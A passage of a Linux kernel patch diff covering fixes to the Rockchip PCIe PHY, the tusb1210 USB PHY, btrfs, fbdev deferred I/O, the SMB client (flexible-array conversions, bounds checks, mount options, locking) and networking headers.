+@@ -139,31 +141,24 @@ static int rockchip_p3phy_rk3588_init(struct rockchip_p3phy_priv *priv)
+ 
+ 	/* Set bifurcation if needed */
+ 	for (int i = 0; i < priv->num_lanes; i++) {
+-		if (!priv->lanes[i])
+-			mode |= (BIT(i) << 3);
+-
+ 		if (priv->lanes[i] > 1)
+-			mode |= (BIT(i) >> 1);
+-	}
+-
+-	if (!mode)
+-		reg = RK3588_LANE_AGGREGATION;
+-	else {
+-		if (mode & (BIT(0) | BIT(1)))
+-			reg |= RK3588_BIFURCATION_LANE_0_1;
+-
+-		if (mode & (BIT(2) | BIT(3)))
+-			reg |= RK3588_BIFURCATION_LANE_2_3;
++			mode &= ~RK3588_LANE_AGGREGATION;
++		if (priv->lanes[i] == 3)
++			mode |= RK3588_BIFURCATION_LANE_0_1;
++		if (priv->lanes[i] == 4)
++			mode |= RK3588_BIFURCATION_LANE_2_3;
+ 	}
+ 
+-	regmap_write(priv->phy_grf, RK3588_PCIE3PHY_GRF_CMN_CON0, (0x7<<16) | reg);
++	reg = mode;
++	regmap_write(priv->phy_grf, RK3588_PCIE3PHY_GRF_CMN_CON0,
++		     RK3588_PCIE30_PHY_MODE_EN | reg);
+ 
+ 	/* Set pcie1ln_sel in PHP_GRF_PCIESEL_CON */
+ 	if (!IS_ERR(priv->pipe_grf)) {
+-		reg = (mode & (BIT(6) | BIT(7))) >> 6;
++		reg = mode & (RK3588_BIFURCATION_LANE_0_1 | RK3588_BIFURCATION_LANE_2_3);
+ 		if (reg)
+ 			regmap_write(priv->pipe_grf, PHP_GRF_PCIESEL_CON,
+-				     (reg << 16) | reg);
++				     RK3588_PCIE1LN_SEL_EN | reg);
+ 	}
+ 
+ 	reset_control_deassert(priv->p30phy);
+diff --git a/drivers/phy/ti/phy-tusb1210.c b/drivers/phy/ti/phy-tusb1210.c
+index 669c13d6e402f..bdd44ec3e8098 100644
+--- a/drivers/phy/ti/phy-tusb1210.c
++++ b/drivers/phy/ti/phy-tusb1210.c
+@@ -64,7 +64,6 @@ struct tusb1210 {
+ 	struct delayed_work chg_det_work;
+ 	struct notifier_block psy_nb;
+ 	struct power_supply *psy;
+-	struct power_supply *charger;
+ #endif
+ };
+ 
+@@ -230,19 +229,24 @@ static const char * const tusb1210_chargers[] = {
+ 
+ static bool tusb1210_get_online(struct tusb1210 *tusb)
+ {
++	struct power_supply *charger = NULL;
+ 	union power_supply_propval val;
+-	int i;
++	bool online = false;
++	int i, ret;
+ 
+-	for (i = 0; i < ARRAY_SIZE(tusb1210_chargers) && !tusb->charger; i++)
+-		tusb->charger = power_supply_get_by_name(tusb1210_chargers[i]);
++	for (i = 0; i < ARRAY_SIZE(tusb1210_chargers) && !charger; i++)
++		charger = power_supply_get_by_name(tusb1210_chargers[i]);
+ 
+-	if (!tusb->charger)
++	if (!charger)
+ 		return false;
+ 
+-	if (power_supply_get_property(tusb->charger, POWER_SUPPLY_PROP_ONLINE, &val))
+-		return false;
++	ret = power_supply_get_property(charger, POWER_SUPPLY_PROP_ONLINE, &val);
++	if (ret == 0)
++		online = val.intval;
++
++	power_supply_put(charger);
+ 
+-	return val.intval;
++	return online;
+ }
+ 
+ static void tusb1210_chg_det_work(struct work_struct *work)
+@@ -466,9 +470,6 @@ static void tusb1210_remove_charger_detect(struct tusb1210 *tusb)
+ 		cancel_delayed_work_sync(&tusb->chg_det_work);
+ 		power_supply_unregister(tusb->psy);
+ 	}
+-
+-	if (tusb->charger)
+-		power_supply_put(tusb->charger);
+ }
+ #else
+ static void tusb1210_probe_charger_detect(struct tusb1210 *tusb) { }
+diff --git a/drivers/video/fbdev/core/fb_defio.c b/drivers/video/fbdev/core/fb_defio.c
+index 49883c8012e60..3b376345d4d47 100644
+--- a/drivers/video/fbdev/core/fb_defio.c
++++ b/drivers/video/fbdev/core/fb_defio.c
+@@ -200,7 +200,7 @@ static vm_fault_t fb_deferred_io_track_page(struct fb_info *info, unsigned long
+  */
+ static vm_fault_t fb_deferred_io_page_mkwrite(struct fb_info *info, struct vm_fault *vmf)
+ {
+-	unsigned long offset = vmf->address - vmf->vma->vm_start;
++	unsigned long offset = vmf->pgoff << PAGE_SHIFT;
+ 	struct page *page = vmf->page;
+ 
+ 	file_update_time(vmf->vma->vm_file);
+diff --git a/fs/btrfs/backref.c b/fs/btrfs/backref.c
+index 18cf801ab5908..23d0372e88821 100644
+--- a/fs/btrfs/backref.c
++++ b/fs/btrfs/backref.c
+@@ -2475,20 +2475,14 @@ struct btrfs_data_container *init_data_container(u32 total_bytes)
+ 	size_t alloc_bytes;
+ 
+ 	alloc_bytes = max_t(size_t, total_bytes, sizeof(*data));
+-	data = kvmalloc(alloc_bytes, GFP_KERNEL);
++	data = kvzalloc(alloc_bytes, GFP_KERNEL);
+ 	if (!data)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	if (total_bytes >= sizeof(*data)) {
++	if (total_bytes >= sizeof(*data))
+ 		data->bytes_left = total_bytes - sizeof(*data);
+-		data->bytes_missing = 0;
+-	} else {
++	else
+ 		data->bytes_missing = sizeof(*data) - total_bytes;
+-		data->bytes_left = 0;
+-	}
+-
+-	data->elem_cnt = 0;
+-	data->elem_missed = 0;
+ 
+ 	return data;
+ }
+diff --git a/fs/smb/client/cifs_spnego.h b/fs/smb/client/cifs_spnego.h
+index 7f102ffeb6750..e4d751b0c8127 100644
+--- a/fs/smb/client/cifs_spnego.h
++++ b/fs/smb/client/cifs_spnego.h
+@@ -24,7 +24,7 @@ struct cifs_spnego_msg {
+ 	uint32_t	flags;
+ 	uint32_t	sesskey_len;
+ 	uint32_t	secblob_len;
+-	uint8_t		data[1];
++	uint8_t		data[];
+ };
+ 
+ #ifdef __KERNEL__
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 0a79771c8f33b..f0a3336ffb6c8 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -387,6 +387,7 @@ cifs_alloc_inode(struct super_block *sb)
+ 	 * server, can not assume caching of file data or metadata.
+ 	 */
+ 	cifs_set_oplock_level(cifs_inode, 0);
++	cifs_inode->lease_granted = false;
+ 	cifs_inode->flags = 0;
+ 	spin_lock_init(&cifs_inode->writers_lock);
+ 	cifs_inode->writers = 0;
+diff --git a/fs/smb/client/cifspdu.h b/fs/smb/client/cifspdu.h
+index 97bb1838555b4..9cb4577063344 100644
+--- a/fs/smb/client/cifspdu.h
++++ b/fs/smb/client/cifspdu.h
+@@ -562,7 +562,7 @@ typedef union smb_com_session_setup_andx {
+ 		__u32 Reserved;
+ 		__le32 Capabilities;	/* see below */
+ 		__le16 ByteCount;
+-		unsigned char SecurityBlob[1];	/* followed by */
++		unsigned char SecurityBlob[];	/* followed by */
+ 		/* STRING NativeOS */
+ 		/* STRING NativeLanMan */
+ 	} __attribute__((packed)) req;	/* NTLM request format (with
+@@ -582,7 +582,7 @@ typedef union smb_com_session_setup_andx {
+ 		__u32 Reserved;	/* see below */
+ 		__le32 Capabilities;
+ 		__le16 ByteCount;
+-		unsigned char CaseInsensitivePassword[1];     /* followed by: */
++		unsigned char CaseInsensitivePassword[];     /* followed by: */
+ 		/* unsigned char * CaseSensitivePassword; */
+ 		/* STRING AccountName */
+ 		/* STRING PrimaryDomain */
+@@ -599,7 +599,7 @@ typedef union smb_com_session_setup_andx {
+ 		__le16 Action;	/* see below */
+ 		__le16 SecurityBlobLength;
+ 		__u16 ByteCount;
+-		unsigned char SecurityBlob[1];	/* followed by */
++		unsigned char SecurityBlob[];	/* followed by */
+ /*      unsigned char  * NativeOS;      */
+ /*	unsigned char  * NativeLanMan;  */
+ /*      unsigned char  * PrimaryDomain; */
+@@ -618,7 +618,7 @@ typedef union smb_com_session_setup_andx {
+ 		__le16 PasswordLength;
+ 		__u32 Reserved; /* encrypt key len and offset */
+ 		__le16 ByteCount;
+-		unsigned char AccountPassword[1];	/* followed by */
++		unsigned char AccountPassword[];	/* followed by */
+ 		/* STRING AccountName */
+ 		/* STRING PrimaryDomain */
+ 		/* STRING NativeOS */
+@@ -632,7 +632,7 @@ typedef union smb_com_session_setup_andx {
+ 		__le16 AndXOffset;
+ 		__le16 Action;	/* see below */
+ 		__u16 ByteCount;
+-		unsigned char NativeOS[1];	/* followed by */
++		unsigned char NativeOS[];	/* followed by */
+ /*	unsigned char * NativeLanMan; */
+ /*      unsigned char * PrimaryDomain; */
+ 	} __attribute__((packed)) old_resp; /* pre-NTLM (LANMAN2.1) response */
+@@ -693,7 +693,7 @@ typedef struct smb_com_tconx_req {
+ 	__le16 Flags;		/* see below */
+ 	__le16 PasswordLength;
+ 	__le16 ByteCount;
+-	unsigned char Password[1];	/* followed by */
++	unsigned char Password[];	/* followed by */
+ /* STRING Path    *//* \\server\share name */
+ 	/* STRING Service */
+ } __attribute__((packed)) TCONX_REQ;
+@@ -705,7 +705,7 @@ typedef struct smb_com_tconx_rsp {
+ 	__le16 AndXOffset;
+ 	__le16 OptionalSupport;	/* see below */
+ 	__u16 ByteCount;
+-	unsigned char Service[1];	/* always ASCII, not Unicode */
++	unsigned char Service[];	/* always ASCII, not Unicode */
+ 	/* STRING NativeFileSystem */
+ } __attribute__((packed)) TCONX_RSP;
+ 
+@@ -718,7 +718,7 @@ typedef struct smb_com_tconx_rsp_ext {
+ 	__le32 MaximalShareAccessRights;
+ 	__le32 GuestMaximalShareAccessRights;
+ 	__u16 ByteCount;
+-	unsigned char Service[1];	/* always ASCII, not Unicode */
++	unsigned char Service[];	/* always ASCII, not Unicode */
+ 	/* STRING NativeFileSystem */
+ } __attribute__((packed)) TCONX_RSP_EXT;
+ 
+@@ -755,14 +755,14 @@ typedef struct smb_com_echo_req {
+ 	struct	smb_hdr hdr;
+ 	__le16	EchoCount;
+ 	__le16	ByteCount;
+-	char	Data[1];
++	char	Data[];
+ } __attribute__((packed)) ECHO_REQ;
+ 
+ typedef struct smb_com_echo_rsp {
+ 	struct	smb_hdr hdr;
+ 	__le16	SequenceNumber;
+ 	__le16	ByteCount;
+-	char	Data[1];
++	char	Data[];
+ } __attribute__((packed)) ECHO_RSP;
+ 
+ typedef struct smb_com_logoff_andx_req {
+@@ -862,7 +862,7 @@ typedef struct smb_com_open_req {	/* also handles create */
+ 	__le32 ImpersonationLevel;
+ 	__u8 SecurityFlags;
+ 	__le16 ByteCount;
+-	char fileName[1];
++	char fileName[];
+ } __attribute__((packed)) OPEN_REQ;
+ 
+ /* open response: oplock levels */
+@@ -882,7 +882,7 @@ typedef struct smb_com_open_rsp {
+ 	__u8 OplockLevel;
+ 	__u16 Fid;
+ 	__le32 CreateAction;
+-	struct_group(common_attributes,
++	struct_group_attr(common_attributes, __packed,
+ 		__le64 CreationTime;
+ 		__le64 LastAccessTime;
+ 		__le64 LastWriteTime;
+@@ -939,7 +939,7 @@ typedef struct smb_com_openx_req {
+ 	__le32 Timeout;
+ 	__le32 Reserved;
+ 	__le16  ByteCount;  /* file name follows */
+-	char   fileName[1];
++	char   fileName[];
+ } __attribute__((packed)) OPENX_REQ;
+ 
+ typedef struct smb_com_openx_rsp {
+@@ -1087,7 +1087,7 @@ typedef struct smb_com_lock_req {
+ 	__le16 NumberOfUnlocks;
+ 	__le16 NumberOfLocks;
+ 	__le16 ByteCount;
+-	LOCKING_ANDX_RANGE Locks[1];
++	LOCKING_ANDX_RANGE Locks[];
+ } __attribute__((packed)) LOCK_REQ;
+ 
+ /* lock type */
+@@ -1116,7 +1116,7 @@ typedef struct smb_com_rename_req {
+ 	__le16 SearchAttributes;	/* target file attributes */
+ 	__le16 ByteCount;
+ 	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
+-	unsigned char OldFileName[1];
++	unsigned char OldFileName[];
+ 	/* followed by __u8 BufferFormat2 */
+ 	/* followed by NewFileName */
+ } __attribute__((packed)) RENAME_REQ;
+@@ -1136,7 +1136,7 @@ typedef struct smb_com_copy_req {
+ 	__le16 Flags;
+ 	__le16 ByteCount;
+ 	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
+-	unsigned char OldFileName[1];
++	unsigned char OldFileName[];
+ 	/* followed by __u8 BufferFormat2 */
+ 	/* followed by NewFileName string */
+ } __attribute__((packed)) COPY_REQ;
+@@ -1146,7 +1146,7 @@ typedef struct smb_com_copy_rsp {
+ 	__le16 CopyCount;    /* number of files copied */
+ 	__u16 ByteCount;    /* may be zero */
+ 	__u8 BufferFormat;  /* 0x04 - only present if errored file follows */
+-	unsigned char ErrorFileName[1]; /* only present if error in copy */
++	unsigned char ErrorFileName[]; /* only present if error in copy */
+ } __attribute__((packed)) COPY_RSP;
+ 
+ #define CREATE_HARD_LINK		0x103
+@@ -1160,7 +1160,7 @@ typedef struct smb_com_nt_rename_req {	/* A5 - also used for create hardlink */
+ 	__le32 ClusterCount;
+ 	__le16 ByteCount;
+ 	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
+-	unsigned char OldFileName[1];
++	unsigned char OldFileName[];
+ 	/* followed by __u8 BufferFormat2 */
+ 	/* followed by NewFileName */
+ } __attribute__((packed)) NT_RENAME_REQ;
+@@ -1175,7 +1175,7 @@ typedef struct smb_com_delete_file_req {
+ 	__le16 SearchAttributes;
+ 	__le16 ByteCount;
+ 	__u8 BufferFormat;	/* 4 = ASCII */
+-	unsigned char fileName[1];
++	unsigned char fileName[];
+ } __attribute__((packed)) DELETE_FILE_REQ;
+ 
+ typedef struct smb_com_delete_file_rsp {
+@@ -1187,7 +1187,7 @@ typedef struct smb_com_delete_directory_req {
+ 	struct smb_hdr hdr;	/* wct = 0 */
+ 	__le16 ByteCount;
+ 	__u8 BufferFormat;	/* 4 = ASCII */
+-	unsigned char DirName[1];
++	unsigned char DirName[];
+ } __attribute__((packed)) DELETE_DIRECTORY_REQ;
+ 
+ typedef struct smb_com_delete_directory_rsp {
+@@ -1199,7 +1199,7 @@ typedef struct smb_com_create_directory_req {
+ 	struct smb_hdr hdr;	/* wct = 0 */
+ 	__le16 ByteCount;
+ 	__u8 BufferFormat;	/* 4 = ASCII */
+-	unsigned char DirName[1];
++	unsigned char DirName[];
+ } __attribute__((packed)) CREATE_DIRECTORY_REQ;
+ 
+ typedef struct smb_com_create_directory_rsp {
+@@ -1211,7 +1211,7 @@ typedef struct smb_com_query_information_req {
+ 	struct smb_hdr hdr;     /* wct = 0 */
+ 	__le16 ByteCount;	/* 1 + namelen + 1 */
+ 	__u8 BufferFormat;      /* 4 = ASCII */
+-	unsigned char FileName[1];
++	unsigned char FileName[];
+ } __attribute__((packed)) QUERY_INFORMATION_REQ;
+ 
+ typedef struct smb_com_query_information_rsp {
+@@ -1231,7 +1231,7 @@ typedef struct smb_com_setattr_req {
+ 	__le16 reserved[5]; /* must be zero */
+ 	__u16  ByteCount;
+ 	__u8   BufferFormat; /* 4 = ASCII */
+-	unsigned char fileName[1];
++	unsigned char fileName[];
+ } __attribute__((packed)) SETATTR_REQ;
+ 
+ typedef struct smb_com_setattr_rsp {
+@@ -1313,7 +1313,7 @@ typedef struct smb_com_transaction_ioctl_req {
+ 	__u8 IsRootFlag; /* 1 = apply command to root of share (must be DFS) */
+ 	__le16 ByteCount;
+ 	__u8 Pad[3];
+-	__u8 Data[1];
++	__u8 Data[];
+ } __attribute__((packed)) TRANSACT_IOCTL_REQ;
+ 
+ typedef struct smb_com_transaction_compr_ioctl_req {
+@@ -1431,8 +1431,8 @@ typedef struct smb_com_transaction_change_notify_req {
+ 	__u8 WatchTree;  /* 1 = Monitor subdirectories */
+ 	__u8 Reserved2;
+ 	__le16 ByteCount;
+-/* 	__u8 Pad[3];*/
+-/*	__u8 Data[1];*/
++/*	__u8 Pad[3];*/
++/*	__u8 Data[];*/
+ } __attribute__((packed)) TRANSACT_CHANGE_NOTIFY_REQ;
+ 
+ /* BB eventually change to use generic ntransact rsp struct
+@@ -1521,7 +1521,7 @@ struct cifs_quota_data {
+ 	__u64	space_used;
+ 	__u64	soft_limit;
+ 	__u64	hard_limit;
+-	char	sid[1];  /* variable size? */
++	char	sid[];  /* variable size? */
+ } __attribute__((packed));
+ 
+ /* quota sub commands */
+@@ -1673,7 +1673,7 @@ typedef struct smb_com_transaction2_qpi_req {
+ 	__u8 Pad;
+ 	__le16 InformationLevel;
+ 	__u32 Reserved4;
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) TRANSACTION2_QPI_REQ;
+ 
+ typedef struct smb_com_transaction2_qpi_rsp {
+@@ -1706,7 +1706,7 @@ typedef struct smb_com_transaction2_spi_req {
+ 	__u16 Pad1;
+ 	__le16 InformationLevel;
+ 	__u32 Reserved4;
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) TRANSACTION2_SPI_REQ;
+ 
+ typedef struct smb_com_transaction2_spi_rsp {
+@@ -1813,7 +1813,7 @@ typedef struct smb_com_transaction2_ffirst_req {
+ 	__le16 SearchFlags;
+ 	__le16 InformationLevel;
+ 	__le32 SearchStorageType;
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) TRANSACTION2_FFIRST_REQ;
+ 
+ typedef struct smb_com_transaction2_ffirst_rsp {
+@@ -2024,7 +2024,7 @@ typedef struct smb_com_transaction2_get_dfs_refer_req {
+ 				   perhaps?) followed by one byte pad - doesn't
+ 				   seem to matter though */
+ 	__le16 MaxReferralLevel;
+-	char RequestFileName[1];
++	char RequestFileName[];
+ } __attribute__((packed)) TRANSACTION2_GET_DFS_REFER_REQ;
+ 
+ #define DFS_VERSION cpu_to_le16(0x0003)
+@@ -2053,7 +2053,7 @@ struct get_dfs_referral_rsp {
+ 	__le16 PathConsumed;
+ 	__le16 NumberOfReferrals;
+ 	__le32 DFSFlags;
+-	REFERRAL3 referrals[1];	/* array of level 3 dfs_referral structures */
++	REFERRAL3 referrals[];	/* array of level 3 dfs_referral structures */
+ 	/* followed by the strings pointed to by the referral structures */
+ } __packed;
+ 
+@@ -2270,7 +2270,7 @@ typedef struct {
+ /* QueryFileInfo/QueryPathinfo (also for SetPath/SetFile) data buffer formats */
+ /******************************************************************************/
+ typedef struct { /* data block encoding of response to level 263 QPathInfo */
+-	struct_group(common_attributes,
++	struct_group_attr(common_attributes, __packed,
+ 		__le64 CreationTime;
+ 		__le64 LastAccessTime;
+ 		__le64 LastWriteTime;
+@@ -2292,7 +2292,10 @@ typedef struct { /* data block encoding of response to level 263 QPathInfo */
+ 	__le32 Mode;
+ 	__le32 AlignmentRequirement;
+ 	__le32 FileNameLength;
+-	char FileName[1];
++	union {
++		char __pad;
++		DECLARE_FLEX_ARRAY(char, FileName);
++	};
+ } __attribute__((packed)) FILE_ALL_INFO;	/* level 0x107 QPathInfo */
+ 
+ typedef struct {
+@@ -2330,7 +2333,7 @@ typedef struct {
+ } __attribute__((packed)) FILE_UNIX_BASIC_INFO;	/* level 0x200 QPathInfo */
+ 
+ typedef struct {
+-	char LinkDest[1];
++	DECLARE_FLEX_ARRAY(char, LinkDest);
+ } __attribute__((packed)) FILE_UNIX_LINK_INFO;	/* level 0x201 QPathInfo */
+ 
+ /* The following three structures are needed only for
+@@ -2380,7 +2383,7 @@ struct file_end_of_file_info {
+ } __attribute__((packed)); /* size info, level 0x104 for set, 0x106 for query */
+ 
+ struct file_alt_name_info {
+-	__u8   alt_name[1];
++	DECLARE_FLEX_ARRAY(__u8, alt_name);
+ } __attribute__((packed));      /* level 0x0108 */
+ 
+ struct file_stream_info {
+@@ -2490,7 +2493,10 @@ typedef struct {
+ 	__le32 NextEntryOffset;
+ 	__u32 ResumeKey; /* as with FileIndex - no need to convert */
+ 	FILE_UNIX_BASIC_INFO basic;
+-	char FileName[1];
++	union {
++		char __pad;
++		DECLARE_FLEX_ARRAY(char, FileName);
++	};
+ } __attribute__((packed)) FILE_UNIX_INFO; /* level 0x202 */
+ 
+ typedef struct {
+@@ -2504,7 +2510,7 @@ typedef struct {
+ 	__le64 AllocationSize;
+ 	__le32 ExtFileAttributes;
+ 	__le32 FileNameLength;
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) FILE_DIRECTORY_INFO;   /* level 0x101 FF resp data */
+ 
+ typedef struct {
+@@ -2519,7 +2525,7 @@ typedef struct {
+ 	__le32 ExtFileAttributes;
+ 	__le32 FileNameLength;
+ 	__le32 EaSize; /* length of the xattrs */
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) FILE_FULL_DIRECTORY_INFO; /* level 0x102 rsp data */
+ 
+ typedef struct {
+@@ -2536,7 +2542,7 @@ typedef struct {
+ 	__le32 EaSize; /* EA size */
+ 	__le32 Reserved;
+ 	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit*/
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) SEARCH_ID_FULL_DIR_INFO; /* level 0x105 FF rsp data */
+ 
+ typedef struct {
+@@ -2554,7 +2560,7 @@ typedef struct {
+ 	__u8   ShortNameLength;
+ 	__u8   Reserved;
+ 	__u8   ShortName[24];
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) FILE_BOTH_DIRECTORY_INFO; /* level 0x104 FFrsp data */
+ 
+ typedef struct {
+@@ -2569,7 +2575,7 @@ typedef struct {
+ 	__le32 AllocationSize;
+ 	__le16 Attributes; /* verify not u32 */
+ 	__u8   FileNameLength;
+-	char FileName[1];
++	char FileName[];
+ } __attribute__((packed)) FIND_FILE_STANDARD_INFO; /* level 0x1 FF resp data */
+ 
+ 
+@@ -2579,16 +2585,6 @@ struct win_dev {
+ 	__le64 minor;
+ } __attribute__((packed));
+ 
+-struct gea {
+-	unsigned char name_len;
+-	char name[1];
+-} __attribute__((packed));
+-
+-struct gealist {
+-	unsigned long list_len;
+-	struct gea list[1];
+-} __attribute__((packed));
+-
+ struct fea {
+ 	unsigned char EA_flags;
+ 	__u8 name_len;
+diff --git a/fs/smb/client/fs_context.c b/fs/smb/client/fs_context.c
+index 4d5302b58b534..ca39d01077cdf 100644
+--- a/fs/smb/client/fs_context.c
++++ b/fs/smb/client/fs_context.c
+@@ -676,6 +676,16 @@ static int smb3_fs_context_validate(struct fs_context *fc)
+ 	/* set the port that we got earlier */
+ 	cifs_set_port((struct sockaddr *)&ctx->dstaddr, ctx->port);
+ 
++	if (ctx->uid_specified && !ctx->forceuid_specified) {
++		ctx->override_uid = 1;
++		pr_notice("enabling forceuid mount option implicitly because uid= option is specified\n");
++	}
++
++	if (ctx->gid_specified && !ctx->forcegid_specified) {
++		ctx->override_gid = 1;
++		pr_notice("enabling forcegid mount option implicitly because gid= option is specified\n");
++	}
++
+ 	if (ctx->override_uid && !ctx->uid_specified) {
+ 		ctx->override_uid = 0;
+ 		pr_notice("ignoring forceuid mount option specified with no uid= option\n");
+@@ -923,12 +933,14 @@ static int smb3_fs_context_parse_param(struct fs_context *fc,
+ 			ctx->override_uid = 0;
+ 		else
+ 			ctx->override_uid = 1;
++		ctx->forceuid_specified = true;
+ 		break;
+ 	case Opt_forcegid:
+ 		if (result.negated)
+ 			ctx->override_gid = 0;
+ 		else
+ 			ctx->override_gid = 1;
++		ctx->forcegid_specified = true;
+ 		break;
+ 	case Opt_perm:
+ 		if (result.negated)
+diff --git a/fs/smb/client/fs_context.h b/fs/smb/client/fs_context.h
+index 26093f54d3e65..319a91b7f6700 100644
+--- a/fs/smb/client/fs_context.h
++++ b/fs/smb/client/fs_context.h
+@@ -154,6 +154,8 @@ enum cifs_param {
+ };
+ 
+ struct smb3_fs_context {
++	bool forceuid_specified;
++	bool forcegid_specified;
+ 	bool uid_specified;
+ 	bool cruid_specified;
+ 	bool gid_specified;
+diff --git a/fs/smb/client/readdir.c b/fs/smb/client/readdir.c
+index 5990bdbae598f..9a1f1913fb592 100644
+--- a/fs/smb/client/readdir.c
++++ b/fs/smb/client/readdir.c
+@@ -497,7 +497,7 @@ static char *nxt_dir_entry(char *old_entry, char *end_of_smb, int level)
+ 		FIND_FILE_STANDARD_INFO *pfData;
+ 		pfData = (FIND_FILE_STANDARD_INFO *)pDirInfo;
+ 
+-		new_entry = old_entry + sizeof(FIND_FILE_STANDARD_INFO) +
++		new_entry = old_entry + sizeof(FIND_FILE_STANDARD_INFO) + 1 +
+ 				pfData->FileNameLength;
+ 	} else {
+ 		u32 next_offset = le32_to_cpu(pDirInfo->NextEntryOffset);
+@@ -515,9 +515,9 @@ static char *nxt_dir_entry(char *old_entry, char *end_of_smb, int level)
+ 			 new_entry, end_of_smb, old_entry);
+ 		return NULL;
+ 	} else if (((level == SMB_FIND_FILE_INFO_STANDARD) &&
+-		    (new_entry + sizeof(FIND_FILE_STANDARD_INFO) > end_of_smb))
++		    (new_entry + sizeof(FIND_FILE_STANDARD_INFO) + 1 > end_of_smb))
+ 		  || ((level != SMB_FIND_FILE_INFO_STANDARD) &&
+-		   (new_entry + sizeof(FILE_DIRECTORY_INFO) > end_of_smb)))  {
++		   (new_entry + sizeof(FILE_DIRECTORY_INFO) + 1 > end_of_smb)))  {
+ 		cifs_dbg(VFS, "search entry %p extends after end of SMB %p\n",
+ 			 new_entry, end_of_smb);
+ 		return NULL;
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index cc425a616899a..e15bf116c7558 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -5073,10 +5073,10 @@ smb2_parse_query_directory(struct cifs_tcon *tcon,
+ 
+ 	switch (srch_inf->info_level) {
+ 	case SMB_FIND_FILE_DIRECTORY_INFO:
+-		info_buf_size = sizeof(FILE_DIRECTORY_INFO) - 1;
++		info_buf_size = sizeof(FILE_DIRECTORY_INFO);
+ 		break;
+ 	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
+-		info_buf_size = sizeof(SEARCH_ID_FULL_DIR_INFO) - 1;
++		info_buf_size = sizeof(SEARCH_ID_FULL_DIR_INFO);
+ 		break;
+ 	case SMB_FIND_FILE_POSIX_INFO:
+ 		/* note that posix payload are variable size */
+diff --git a/fs/smb/client/smb2pdu.h b/fs/smb/client/smb2pdu.h
+index 8d011fedecd03..2823526b66f7e 100644
+--- a/fs/smb/client/smb2pdu.h
++++ b/fs/smb/client/smb2pdu.h
+@@ -339,7 +339,7 @@ struct smb2_file_reparse_point_info {
+ } __packed;
+ 
+ struct smb2_file_network_open_info {
+-	struct_group(network_open_info,
++	struct_group_attr(network_open_info, __packed,
+ 		__le64 CreationTime;
+ 		__le64 LastAccessTime;
+ 		__le64 LastWriteTime;
+@@ -373,7 +373,7 @@ struct smb2_file_id_extd_directory_info {
+ 	__le32 EaSize; /* EA size */
+ 	__le32 ReparsePointTag; /* valid if FILE_ATTR_REPARSE_POINT set in FileAttributes */
+ 	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit */
+-	char FileName[1];
++	char FileName[];
+ } __packed; /* level 60 */
+ 
+ extern char smb2_padding[7];
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+index df44acaec9ae9..338b34c99b2de 100644
+--- a/fs/smb/client/transport.c
++++ b/fs/smb/client/transport.c
+@@ -931,12 +931,15 @@ cifs_sync_mid_result(struct mid_q_entry *mid, struct TCP_Server_Info *server)
+ 			list_del_init(&mid->qhead);
+ 			mid->mid_flags |= MID_DELETED;
+ 		}
++		spin_unlock(&server->mid_lock);
+ 		cifs_server_dbg(VFS, "%s: invalid mid state mid=%llu state=%d\n",
+ 			 __func__, mid->mid, mid->mid_state);
+ 		rc = -EIO;
++		goto sync_mid_done;
+ 	}
+ 	spin_unlock(&server->mid_lock);
+ 
++sync_mid_done:
+ 	release_mid(mid);
+ 	return rc;
+ }
+diff --git a/include/linux/etherdevice.h b/include/linux/etherdevice.h
+index a541f0c4f146c..d7eef2158667d 100644
+--- a/include/linux/etherdevice.h
++++ b/include/linux/etherdevice.h
+@@ -593,6 +593,31 @@ static inline void eth_hw_addr_gen(struct net_device *dev, const u8 *base_addr,
+ 	eth_hw_addr_set(dev, addr);
+ }
+ 
++/**
++ * eth_skb_pkt_type - Assign packet type if destination address does not match
++ * @skb: Assigned a packet type if address does not match @dev address
++ * @dev: Network device used to compare packet address against
++ *
++ * If the destination MAC address of the packet does not match the network
++ * device address, assign an appropriate packet type.
++ */
++static inline void eth_skb_pkt_type(struct sk_buff *skb,
++				    const struct net_device *dev)
++{
++	const struct ethhdr *eth = eth_hdr(skb);
++
++	if (unlikely(!ether_addr_equal_64bits(eth->h_dest, dev->dev_addr))) {
++		if (unlikely(is_multicast_ether_addr_64bits(eth->h_dest))) {
++			if (ether_addr_equal_64bits(eth->h_dest, dev->broadcast))
++				skb->pkt_type = PACKET_BROADCAST;
++			else
++				skb->pkt_type = PACKET_MULTICAST;
++		} else {
++			skb->pkt_type = PACKET_OTHERHOST;
++		}
++	}
++}
++
+ /**
+  * eth_skb_pad - Pad buffer to mininum number of octets for Ethernet frame
+  * @skb: Buffer to pad
+diff --git a/include/net/af_unix.h b/include/net/af_unix.h
+index 16d6936baa2fb..e7d71a516bd4d 100644
+--- a/include/net/af_unix.h
++++ b/include/net/af_unix.h
+@@ -79,6 +79,9 @@ enum unix_socket_lock_class {
+ 	U_LOCK_NORMAL,
+ 	U_LOCK_SECOND,	/* for double locking, see unix_state_double_lock(). */
+ 	U_LOCK_DIAG, /* used while dumping icons, see sk_diag_dump_icons(). */
++	U_LOCK_GC_LISTENER, /* used for listening socket while determining gc
++			     * candidates to close a small race window.
++			     */
+ };
+ 
+ static inline void unix_state_lock_nested(struct sock *sk,
+diff --git a/include/net/macsec.h b/include/net/macsec.h
+index 65c93959c2dc5..dd578d193f9aa 100644
+--- a/include/net/macsec.h
++++ b/include/net/macsec.h
+@@ -302,6 +302,7 @@ struct macsec_ops {
+ 	int (*mdo_get_tx_sa_stats)(struct macsec_context *ctx);
